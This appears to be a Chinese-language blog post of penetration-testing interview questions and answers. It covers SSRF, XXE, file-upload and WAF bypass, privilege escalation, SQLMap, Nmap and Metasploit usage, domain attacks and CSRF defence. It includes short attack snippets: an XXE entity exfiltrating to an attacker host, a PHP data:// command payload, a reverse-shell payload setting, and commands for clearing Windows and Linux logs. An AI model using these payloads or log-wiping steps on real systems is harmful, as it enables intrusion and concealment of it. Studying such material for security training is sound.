2025年渗透测试面试题总结-拷打题库27(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库27

SSRF原理

SSRF危害

SSRF防御

文件上传分类

文件上传突破方式

常见中间件

XXE原理

XXE分类

XXE引入方式

XXE盲注处理

常见框架

Windows提权

Linux提权

数据库提权

SQLMap常用命令

Nmap常用命令

MSF常用命令

SQL注入Bypass手法

文件上传绕过方法

命令执行绕过

域渗透核心要点

Python工具开发

Python框架

CNVD与CTF经历

CSRF防御

img标签路径泄露

文件包含伪协议

文件上传过滤突破

日志清理(Windows/Linux)

2025年渗透测试面试题总结-拷打题库27

SSRF原理
SSRF危害
SSRF防御
文件上传分类
文件上传的突破
你了解那些中间件
XXE的原理
XXE的分类
XXE有哪些引入方式
遇到XXE的盲注怎么办
遇到过哪些框架
win提权
linux提权
数据库提权
说说SQLmap常用命令
说说nmap常用命令
说说Msf常用命令
SQL注入bypass你会那些手法
文件上传怎么绕过
命令执行怎么绕过
了解域渗透吗?说说域渗透
用python写过工具吗?
python用过那些框架?
有CNVD证书吗?
打过CTF吗?有排名吗?
如何防止CSRF? 
img标签除了onerror属性外,还有其他获取管理员路径的办法吗?
文件包含都有哪些伪协议?
文件上传怎么突破过滤?
清理日志要清理哪些(windows和linux)

SSRF原理

  1. 服务端请求伪造:攻击者诱使服务器向内部或第三方系统发起请求,利用服务器权限绕过网络隔离。
  2. 协议支持广泛性:支持HTTP/HTTPS/FTP/Gopher等协议,Gopher可构造多协议攻击流量(如Redis未授权访问)。
  3. 输入点多样化:通过URL参数、文件解析(PDF/XML)、Webhook回调等触发。

SSRF危害

  1. 内网探测与攻击:扫描内网IP/端口(如Redis 6379、Docker 2375),攻击内网脆弱服务。
  2. 云元数据泄露:访问云服务器元数据接口(如AWS的169.254.169.254),窃取临时凭证。
  3. 协议滥用:利用file://协议读取本地文件,或dict://协议与数据库交互。

SSRF防御

  1. 协议白名单:仅允许HTTP/HTTPS,禁用非常用协议(如Gopher)。
  2. 网络隔离:限制服务器出网权限,使用VPC和防火墙策略。
  3. 输入校验:验证请求目标是否为合法域名,禁止IP地址和私有网段(如10.0.0.0/8)。

文件上传分类

  1. 前端校验绕过:修改请求包绕过JavaScript校验。
  2. 内容检测绕过:添加图片头(GIF89a)、使用图像隐写术。
  3. 解析漏洞利用:Apache多扩展名(.php.jpg )、IIS短文件名(~.php)。

文件上传突破方式

  1. 双扩展名shell.php.jpg 绕过简单过滤。
  2. 大小写混淆PhPpHp绕过黑名单。
  3. 00截断:利用空字符截断(shell.php%00.jpg )。

常见中间件

  1. Apache:解析漏洞(.php.xxx )、模块漏洞(mod_cgi)。
  2. Nginx:路径解析错误(/files../)、配置错误导致目录遍历。
  3. Tomcat:PUT方法上传漏洞、War包部署RCE。

XXE原理

  1. XML外部实体注入:通过自定义实体读取本地文件或触发SSRF。
  2. DTD引用:利用<!ENTITY>定义外部实体,引用本地或远程资源。
  3. 盲注攻击:通过DNS/HTTP外带数据,或基于错误回显判断结果。

XXE分类

  1. 有回显XXE:直接读取文件内容并输出到响应中。
  2. 盲注XXE:无直接回显,需通过外带通道(OOB)获取数据。
  3. 错误型XXE:利用解析错误信息泄露数据。

XXE引入方式

  1. 文件上传:SVG、DOCX等XML格式文件解析触发。
  2. API请求:Content-Type为application/xml的POST数据。
  3. SOAP服务:处理XML数据的WebService接口。

XXE盲注处理

  1. 外带数据:利用http://ftp://协议将数据发送到攻击者服务器。
  2. 参数实体:通过%定义参数实体,绕过某些过滤规则。
  3. DNS解析:构造实体触发DNS查询,通过日志获取信息(如<!ENTITY % xxe SYSTEM "http://data.attacker.com"> )。

常见框架

  1. Spring:反序列化漏洞(CVE-2022-22965)。
  2. Struts2:OGNL表达式注入(如S2-045)。
  3. Django:模板注入(CVE-2021-45449)。

Windows提权

  1. 内核漏洞:利用CVE-2021-34527(PrintNightmare)获取SYSTEM权限。
  2. 服务配置:弱权限服务路径(DACL覆盖)、未引用的服务路径。
  3. 令牌窃取:使用Mimikatz抓取高权限令牌或模拟令牌。

Linux提权

  1. SUID滥用:查找具有SUID权限的可执行文件(如find / -perm -4000)。
  2. 内核漏洞:DirtyCow(CVE-2016-5195)覆盖只读内存。
  3. 定时任务:利用全局可写的cron脚本插入恶意代码。

数据库提权

  1. MySQL UDF提权:通过lib_mysqludf_sys执行系统命令。
  2. MSSQL xp_cmdshell:启用并调用xp_cmdshell执行命令。
  3. PostgreSQL COPY TO:写入恶意文件到启动目录(如COPY (SELECT 'malicious code') TO '/etc/cron.d/attack')。

SQLMap常用命令

  1. 基础检测sqlmap -u "http://site.com?id=1" --batch
  2. 文件读写--file-read="/etc/passwd"--file-write="shell.php"
  3. OS交互--os-shell调用系统命令(需DB权限和绝对路径)。

Nmap常用命令

  1. 端口扫描nmap -sS -p 1-65535 192.168.1.1(SYN扫描)。
  2. 服务识别nmap -sV -sC 192.168.1.1(版本探测+脚本检测)。
  3. 漏洞扫描nmap --script vuln 192.168.1.1

MSF常用命令

  1. 模块调用use exploit/windows/smb/ms17_010_eternalblue
  2. Payload设置set payload windows/x64/meterpreter/reverse_tcp
  3. 会话管理sessions -l查看会话,sessions -i <ID>进入会话。

SQL注入Bypass手法

  1. 编码绕过:Hex编码(0x61646D696E代替字符串)、URL编码。
  2. 注释符混淆/*!SELECT*/绕过WAF关键字检测。
  3. 逻辑绕过id=1||1=1替代id=1 or 1=1

文件上传绕过方法

  1. Content-Type修改image/jpeg伪装图片类型。
  2. 文件头伪造:添加GIF89a或PNG头。
  3. .htaccess覆盖:上传.htaccess设置解析规则(如AddType application/x-httpd-php .jpg)。

命令执行绕过

  1. 空格绕过:用${IFS}%09(Tab)或<符号。
  2. 拼接执行a=who;b=ami;$a$b
  3. 通配符利用cat /etc/pass*/???/passwd

域渗透核心要点

  1. 信息收集nltest /dclist获取域控列表,bloodhound分析攻击路径。
  2. 横向移动:Pass-the-Hash、Overpass-the-Hash、DCOM/WMI远程执行。
  3. 权限维持:Golden Ticket、DCShadow伪造域控数据。

Python工具开发

  1. 扫描工具:使用requests库实现目录爆破,socket实现端口扫描。
  2. 漏洞利用:基于pwntools编写缓冲区溢出Payload。
  3. 自动化脚本:利用Scapy构造自定义网络包(如ARP欺骗)。

Python框架

  1. Flask:轻量级Web开发,常用于编写REST API。
  2. Django:全栈框架,内置ORM和Admin面板。
  3. Scrapy:爬虫框架,支持分布式和反反爬策略。

CNVD与CTF经历

  1. CNVD证书:需提交中危以上漏洞并通过审核(如教育行业系统漏洞)。
  2. CTF方向:Web、Reverse、Pwn,需团队协作和快速漏洞挖掘。
  3. 竞赛排名:国内知名赛事如XCTF、强网杯,国际赛事如DEF CON CTF。

CSRF防御

  1. Token验证:表单中嵌入随机Token,服务端校验。
  2. SameSite Cookie:设置SameSite=Strict限制跨域携带Cookie。
  3. Referer检查:验证请求来源是否为合法域名。

img标签路径泄露

  1. srcset属性:通过多分辨率图片路径泄露内部URL。
  2. 跨域错误信息:加载失败时控制台显示404路径。
  3. 低权限资源引用:如<img src="/admin/secret.jpg"> 触发403/401错误,暴露管理员路径。

文件包含伪协议

  1. php://filter:读取文件源码(php://filter/read=convert.base64-encode/resource=index.php )。
  2. data://:执行PHP代码(data://text/plain,<?php system("id");?>)。
  3. phar://:触发反序列化(需上传Phar格式文件)。

文件上传过滤突破

  1. 多扩展名绕过shell.php.jpgshell.jpg.php
  2. 大小写混合Shell.PhP绕过黑名单检测。
  3. 内容伪装:插入合法文件头(如GIF89a),后端检测绕过。

日志清理(Windows/Linux)

  1. Windows
    • 系统日志:wevtutil cl Security清除安全日志。
    • IIS日志:删除%SystemDrive%\inetpub\logs\LogFiles下的文件。
    • PowerShell历史:Remove-Item (Get-PSReadlineOption).HistorySavePath
  2. Linux
    • 系统日志:清空/var/log/auth.log/var/log/syslog
    • 命令历史:history -c或删除~/.bash_history
    • Web日志:清理Apache/Nginx的access.logerror.log
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值